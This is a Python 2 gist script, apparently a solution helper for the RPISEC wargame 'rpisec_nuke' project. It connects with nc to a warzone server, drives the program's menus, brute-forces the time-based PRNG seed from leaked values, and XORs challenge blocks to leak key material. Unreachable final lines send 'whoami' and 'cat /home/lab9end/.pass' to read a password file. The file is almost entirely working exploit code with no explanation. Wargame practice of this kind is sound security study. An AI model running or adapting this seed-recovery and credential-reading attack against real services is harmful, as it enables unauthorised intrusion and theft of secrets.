Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/env python
# project 1 helper script
import subprocess
import binascii
import struct
import sys
import ctypes
import time
from operator import xor
def signThis(i):
return ctypes.c_int32(i).value
# function to read the file descriptor until it finds a string
def readuntil(fd, needle):
data = ""
while needle not in data:
data += fd.read(1)
return data
def dumpOutput(fd):
print "+---------------+"
print "|****DUMPING****|"
print "+---------------+"
while True:
sys.stdout.write(fd.read(1))
def tohex(val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))
def dots(x):
splitSize = 2
ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
return '.'.join(ret)
def xorChallenges(first_challenge, challenge):
first_challenge = [''.join(x.split('.')) for x in first_challenge]
challenge = [''.join(x.split('.')) for x in challenge]
splitSize = 2
for j in xrange(len(first_challenge)):
x = first_challenge[j]
first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
for j in xrange(len(challenge)):
x = challenge[j]
challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
# Xor all the values together
xored = []
for j in xrange(len(challenge)):
x = challenge[j]
y = first_challenge[j]
xored.append([])
for k in xrange(len(x)):
a = ctypes.c_ubyte(int(x[k],16)).value
b = ctypes.c_ubyte(int(y[k],16)).value
xoval = hex(ctypes.c_ubyte(a ^ b).value)
xored[j].append(xoval)
for i in xrange(len(xored)):
line = xored[i]
xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line])
return xored
def findChallenge(cline, ctime, offset):
# Get our random numbers ( 4 needed )
crand.seed_rand(ctime)
rNums = []
for _ in xrange(offset):
crand.get_random()
for _ in xrange(4):
rNums.append(crand.get_random())
# Get the integer values for xoring
cline = ''.join(cline.split('.'))
splitSize = 8
words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)]
# This flips for little endian
for wi in xrange(len(words)):
w = words[wi]
splitSize = 2
words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]])
intVals = [ signThis(int('0x'+x,16)) for x in words ]
# Xor all the values together
xored = []
for i in range(4):
a = rNums[i]
b = intVals[i]
xored.append(ctypes.c_uint32(a ^ b).value)
# Turn the int values back to hex
xoredHex = [ tohex(x,32)[2:-1] for x in xored ]
# Pad those values with 0's for the memory
xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ]
# Flip them for memory order
for xi in xrange(len(xoredHex)):
x = xoredHex[xi]
splitSize = 2
xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]])
cAns = ''.join(xoredHex)
#splitSize = 2
#cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)]
#cAns = '.'.join(cAns)
return cAns
# Import our rand seeder
crand = ctypes.cdll.LoadLibrary("./randlib.so")
crand.seed_rand(int(time.time()))
# run the project
p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
#p = subprocess.Popen('strace /levels/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
# Second Key
p.stdin.write("3\n")
p.stdin.write("\n")
readuntil(p.stdout, "PRESS ENTER TO RETURN TO MENU")
p.stdin.write("\n")
p.stdin.write("2\n")
readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:")
p.stdin.write("\n")
readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):")
p.stdin.write("\n")
readuntil(p.stdout, "DATA LENGTH SET TO")
p.stdin.write("\n")
readuntil(p.stdout, "CRYPTO AUTHENTICATION FAILED")
p.stdin.write("\n")
session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7])
p.stdin.write("3\n")
readuntil(p.stdout, "CHALLENGE (64 Bytes):")
#GET CHALLENGE, GET TIME NOW
challenge = readuntil(p.stdout, "-------------------------------------------------------\n")
challenge = challenge.split("\n")[1:5]
challenge[0] = challenge[0][7:]
challenge = [l[30:] for l in challenge]
readuntil(p.stdout, "TIME NOW:")
challenge_time = readuntil(p.stdout, "\n")
challenge_time = int(challenge_time.strip()[7:])
# Get the seed
CLine = challenge[0]
seed = 0
for x in range(50):
seed = ctypes.c_uint32(challenge_time + session - x).value
if findChallenge(CLine, seed,0) == "0a000000000000000000000000000000":
break
first_challenge = challenge
# Get key 2 using that seed
CLine = challenge[3]
key2 = findChallenge(CLine, seed, 12)
# Get the challenge from 3, thrice xored, + passed
p.stdin.write("\n")
readuntil(p.stdout, "INVALID RESPONSE, AUTHENTICATION FAILURE")
p.stdin.write("\n")
readuntil(p.stdout, "+-----------------------------------------------------+")
p.stdin.write("3\n")
readuntil(p.stdout, "CHALLENGE (64 Bytes):")
challenge = readuntil(p.stdout, "-------------------------------------------------------\n")
challenge = challenge.split("\n")[1:5]
challenge[0] = challenge[0][7:]
challenge = [l[30:] for l in challenge]
answer = challenge
offset = 4
for y in range(2):
for x in xrange(4):
challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4)
offset += 1
# Finally xor with the first_challenge to get the leak
key_only_challenge = xorChallenges(first_challenge, challenge)
challenge = xorChallenges(key_only_challenge, answer)
print key2
print key_only_challenge
#done.
while True:
pass
# Got Root?
time.sleep(0.5)
p.stdin.write("whoami\n")
time.sleep(0.5)
p.stdin.write("cat /home/lab9end/.pass\n")
dumpOutput(p.stdout)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment